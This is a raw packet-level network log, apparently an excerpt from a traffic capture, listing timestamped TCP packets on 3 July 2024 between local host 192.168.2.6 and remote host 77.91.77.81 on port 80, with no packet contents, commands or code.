Jul 3, 2024 18:09:06.363317966 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.363348007 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.363522053 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363533020 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363543987 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363554955 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363563061 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.363567114 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363583088 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.363600016 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.363746881 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363756895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363766909 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363771915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363781929 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363792896 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363799095 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363804102 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.363804102 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363815069 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.363832951 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363843918 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.363847017 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.363872051 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.363892078 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.364136934 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364147902 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364157915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364176035 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.364192009 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.364379883 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364389896 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364399910 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364424944 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364430904 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.364435911 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364450932 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.364450932 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.364450932 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364464045 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364475012 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364476919 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.364491940 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364500046 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.364501953 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364514112 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.364527941 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364538908 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364545107 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.364550114 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364561081 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364569902 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.364572048 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364588976 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.364615917 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.364979029 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.364989996 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.365000010 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.365010023 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.365019083 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.365029097 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.365030050 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.365040064 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.365041018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.365065098 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.365077972 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.365840912 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.365880013 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.368572950 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.368619919 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.368665934 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.368678093 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.368690014 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.368700981 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.368706942 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.368719101 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.368751049 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.368804932 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.368817091 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.368829012 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.368846893 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.368863106 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.368896961 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.368910074 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.368922949 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.368932962 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.368937969 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.368959904 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.368983030 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369031906 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369043112 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369072914 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369085073 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369113922 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369127035 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369138956 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369149923 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369158983 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369162083 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369168997 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369191885 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369195938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369223118 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369236946 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369415045 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369426012 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369436979 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369446993 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369453907 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369463921 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369463921 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369483948 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369496107 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369496107 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369507074 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369513988 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369518995 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369530916 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.369540930 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369554043 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.369579077 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370338917 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370379925 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370405912 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370436907 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370446920 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370464087 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370475054 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370481014 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370481968 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370492935 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370503902 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370516062 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370536089 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370536089 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370536089 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370564938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370564938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370600939 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370613098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370624065 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370645046 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370651960 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370663881 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370666981 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370688915 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370703936 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370836973 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370863914 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370874882 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370877981 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370887041 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370898008 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370898008 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370908022 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370913029 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.370929003 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370944023 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370959044 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.370978117 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.371017933 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.371047020 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.371078014 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.371088982 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.371089935 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.371100903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.371109009 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.371124029 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.371143103 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.375724077 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.375770092 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.375781059 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.375782013 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.375807047 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.375828028 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.375828981 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.375863075 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.375871897 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.375880003 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.375890970 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.375895023 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.375912905 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.375921011 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.375929117 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.375962019 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376055002 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376065969 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376077890 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376087904 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376099110 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376099110 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376130104 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376148939 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376266003 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376310110 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376338959 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376351118 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376362085 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376375914 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376383066 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376405001 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376411915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376424074 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376430035 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376435041 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376446009 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376463890 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376477957 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376601934 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376612902 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376624107 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376636028 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376645088 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376646042 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376656055 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376661062 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376676083 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376683950 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376696110 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376719952 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376873016 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376885891 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376894951 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376907110 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376919985 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376924992 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376936913 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376949072 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376950026 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376959085 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376960993 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376975060 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.376986027 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.376986980 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377000093 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377012014 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377022982 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377026081 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.377033949 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.377078056 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.377279043 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377324104 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.377358913 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377371073 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377409935 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.377424955 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.377444029 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377456903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377471924 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377485037 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377504110 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.377504110 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.377518892 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.377554893 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.377651930 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377664089 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377674103 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377684116 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377696037 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377703905 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.377707958 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377712965 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.377717018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.377751112 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.378586054 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381052017 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381062031 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381072998 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381103039 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381134033 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381177902 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381189108 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381198883 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381218910 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381227970 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381242037 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381278038 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381309032 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381320000 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381361961 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381366968 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381378889 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381388903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381398916 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381409883 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381429911 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381463051 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381660938 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381673098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381685019 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381695032 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381710052 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381712914 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381727934 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381731987 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381742001 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381763935 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381781101 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381855965 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381892920 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.381964922 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381975889 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381988049 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.381999016 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382004976 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382015944 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382015944 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382031918 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382056952 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382086992 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382097960 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382107973 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382119894 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382123947 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382132053 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382143021 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382143021 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382153988 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382164001 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382170916 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382186890 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382189035 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382200956 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382204056 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382211924 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382230043 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382245064 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382740974 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382750988 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382761002 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382771015 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382783890 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382783890 CEST	62923	80	192.168.2.6	77.91.77.81
